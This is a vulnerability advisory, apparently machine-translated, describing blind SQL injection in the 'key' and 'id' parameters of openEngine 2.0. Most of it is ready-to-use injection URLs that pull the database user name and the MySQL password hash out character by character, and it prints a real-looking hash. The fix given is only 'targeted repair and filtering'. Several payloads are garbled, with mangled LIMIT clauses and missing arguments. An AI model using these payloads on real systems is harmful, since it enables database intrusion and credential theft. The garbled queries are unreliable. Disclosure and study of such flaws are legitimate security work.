OpenEngine 2.0 multiple blind injection defects and repair

Title: openEngine 2.0 'key' Blind SQL Injection vulnerability
By Stefan Schurtz
Affected program: Successfully tested on openEngine 2.0 100226
Developer: http://www.openengine.de/
Overview:
======================================
 
The 'key' parameter in openEngine 2.0 is prone to a Blind SQL Injection
 
============================
Technical Analysis
============================
 
# Database Information
User: easy
 
# Blind note:
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm & key =-1 OR 1 = 2-> "Sie m? Chten die Seite versenden ."
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm & key =-1 OR 1 = 1-> "Sie m? Chten die Seite Homepage (de) versenden ."
 
# User-Guessing
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm & key =-1 or ord (MID (select distinct (IFNULL (CAST (grantee as char), CHAR (32 ))) FROM information_schema.USER_PRIVILEGES LIMIT 4, 1), 2, 1) = 101
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm & key =-1 or ord (MID (select distinct (IFNULL (CAST (grantee as char), CHAR (32 ))) FROM information_schema.USER_PRIVILEGES LIMIT 4, 1), 3, 1) = 97
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm & key =-1 or ord (MID (select distinct (IFNULL (CAST (grantee as char), CHAR (32 ))) FROM information_schema.USER_PRIVILEGES LIMIT 4, 1), 4, 1) = 115
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm & key =-1 or ord (MID (select distinct (IFNULL (CAST (grantee as char), CHAR (32 ))) FROM information_schema.USER_PRIVILEGES LIMIT 4, 1), 5, 1) = 121
 
==========
Solution:
==========
 
Targeted repair and filtering
 
 
Title: openEngine 2.0 'id' Blind SQL Injection
Overview:
======================================
 
OpenEngine 2.0 contains blind injection Defects
 
============================
Technical analysis:
============================
 
Database information
 
User: easy
Password: easy (Hash: * E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)
 
Blind SQL Injection
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm') AND 1 = 1
AND ('A' = 'a & key = <-error
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm') AND 1 = 0
AND ('A' = 'a & key = <-no error
 
User-Guessing
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm') AND
ORD (MID (select distinct (IFNULL (CAST (grantee as char), CHAR (32) FROM
Information_schema.USER_PRIVILEGES LIMIT 101),) = AND ('A' = 'a
<-Error (e)
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm') AND
ORD (MID (select distinct (IFNULL (CAST (grantee as char), CHAR (32) FROM
Information_schema.USER_PRIVILEGES LIMIT 4, 1), 3, 1) = 97 AND ('A' = 'a <-
Error ()
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm') AND
ORD (MID (select distinct (IFNULL (CAST (grantee as char), CHAR (32) FROM
Information_schema.USER_PRIVILEGES LIMIT 115),) = AND ('A' = 'a
<-Error (s)
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm') AND
ORD (MID (select distinct (IFNULL (CAST (grantee as char), CHAR (32) FROM
Information_schema.USER_PRIVILEGES LIMIT 4, 1), 5, 1) = 121 AND ('A' = 'a
<-Error (y)
 
Password (Hash)-Guessing
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm') AND
ORD (MID (select distinct (IFNULL (CAST (password as char), CHAR (32) FROM
Mysql. user WHERE user = CHAR (115,121,) LIMIT),) = 42 AND
('A' = 'a <-error (*)
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm') AND
ORD (MID (select distinct (IFNULL (CAST (password as char), CHAR (32) FROM
Mysql. user WHERE user = CHAR (115,121,) LIMIT),) = 69 AND
('A' = 'a <-error (E)
 
Http://www.bkjia.com/openengine/cms/website. php? Id =/de/sendpage.htm') AND
ORD (MID (select distinct (IFNULL (CAST (password as char), CHAR (32) FROM
Mysql. user WHERE user = CHAR (115,121,) LIMIT),) = 56 AND
('A' = 'a <-error (8)
... And so on
 
==========
Solution:
==========
Targeted repair and filtering